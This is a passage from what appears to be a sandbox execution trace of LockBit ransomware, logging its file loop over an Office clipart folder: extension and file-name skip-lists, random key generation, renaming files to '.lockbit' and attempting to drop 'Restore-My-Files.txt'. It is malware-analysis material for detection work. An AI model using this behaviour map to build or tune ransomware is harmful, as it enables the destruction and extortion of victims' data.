lpString2="NA02398_.WMF") returned 1 [0164.413] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02398_.WMF") returned -1 [0164.413] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02398_.WMF") returned -1 [0164.413] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02398_.WMF") returned 1 [0164.413] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02398_.WMF") returned -1 [0164.413] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0164.413] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02398_.WMF") returned=".WMF" [0164.413] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0164.413] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0164.413] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0164.413] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0164.413] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0164.413] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0164.414] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0164.415] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0164.415] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0164.415] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02398_.WMF.lockbit") returned 72 [0164.415] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02398_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02398_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0164.416] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0164.416] malloc (_Size=0x40068) returned 0x3f70048 [0164.416] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=7832) returned 1 [0164.416] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.417] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0164.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.417] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.417] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0164.417] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0164.458] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02398_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02398_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.458] malloc (_Size=0xa6) returned 0x1fa2ed8 [0164.458] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0164.460] free (_Block=0x1fa2ed8) [0164.460] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02398_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0164.460] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0164.460] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0164.460] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6a396cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd24, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02400_.WMF", cAlternateFileName="")) returned 1 [0164.460] lstrcmpiW (lpString1=".", lpString2="NA02400_.WMF") returned -1 [0164.460] lstrcmpiW (lpString1="..", lpString2="NA02400_.WMF") returned -1 [0164.460] PathFindExtensionW (pszPath="NA02400_.WMF") returned=".WMF" [0164.460] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0164.460] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0164.460] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0164.460] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0164.460] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0164.460] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0164.460] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0164.461] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0164.462] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0164.462] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02400_.WMF") returned 1 [0164.462] lstrcmpiW (lpString1="ntldr", lpString2="NA02400_.WMF") returned 1 [0164.462] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02400_.WMF") returned 1 [0164.463] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02400_.WMF") returned -1 [0164.463] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02400_.WMF") returned -1 [0164.463] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02400_.WMF") returned 1 [0164.463] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02400_.WMF") returned -1 [0164.463] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0164.463] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02400_.WMF") returned=".WMF" [0164.463] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0164.463] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0164.463] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0164.463] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0164.463] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0164.463] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0164.463] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0164.463] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0164.463] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0164.463] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0164.463] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0164.464] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0164.464] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0164.483] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0164.483] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02400_.WMF.lockbit") returned 72 [0164.483] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02400_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02400_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0164.488] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0164.489] malloc (_Size=0x40068) returned 0x3df0008 [0164.489] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3364) returned 1 [0164.489] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.489] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0164.489] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.490] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0164.490] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0164.493] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02400_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02400_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0164.493] malloc (_Size=0xa6) returned 0x1fa2ed8 [0164.494] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0164.495] free (_Block=0x1fa2ed8) [0164.495] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02400_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0164.495] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0164.495] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0164.495] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5951e930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2120, dwReserved0=0x0, dwReserved1=0x0, cFileName="NA02404_.WMF", cAlternateFileName="")) returned 1 [0164.495] lstrcmpiW (lpString1=".", lpString2="NA02404_.WMF") returned -1 [0164.495] lstrcmpiW (lpString1="..", lpString2="NA02404_.WMF") returned -1 [0164.495] PathFindExtensionW (pszPath="NA02404_.WMF") returned=".WMF" [0164.495] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0164.495] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0164.495] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.496] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0164.497] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0164.497] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0164.497] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0164.497] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0164.499] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0164.499] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0164.499] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0164.499] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0164.499] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0164.499] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0164.499] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0164.499] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0164.500] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0164.500] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0164.500] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0164.500] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0164.500] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0164.500] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0164.500] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0164.500] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0164.500] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0164.500] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NA02404_.WMF") returned 1 [0164.500] lstrcmpiW (lpString1="ntldr", lpString2="NA02404_.WMF") returned 1 [0164.500] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NA02404_.WMF") returned 1 [0164.500] lstrcmpiW (lpString1="bootsect.bak", lpString2="NA02404_.WMF") returned -1 [0164.500] lstrcmpiW (lpString1="autorun.inf", lpString2="NA02404_.WMF") returned -1 [0164.500] lstrcmpiW (lpString1="thumbs.db", lpString2="NA02404_.WMF") returned 1 [0164.500] lstrcmpiW (lpString1="iconcache.db", lpString2="NA02404_.WMF") returned -1 [0164.500] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0164.500] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02404_.WMF") returned=".WMF" [0164.500] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0164.500] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0164.500] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0164.500] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0164.501] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0164.502] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02404_.WMF.lockbit") returned 72 [0164.502] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02404_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\na02404_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0164.506] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0164.506] malloc (_Size=0x40068) returned 0x1ff1e60 [0164.506] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=8480) returned 1 [0164.506] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.507] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0164.507] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.507] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0164.507] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.045] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02404_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02404_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0165.045] malloc (_Size=0xa6) returned 0x1fa2ed8 [0165.046] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0165.057] free (_Block=0x1fa2ed8) [0165.057] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\NA02404_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0165.060] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0165.060] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0165.060] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5951e930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, 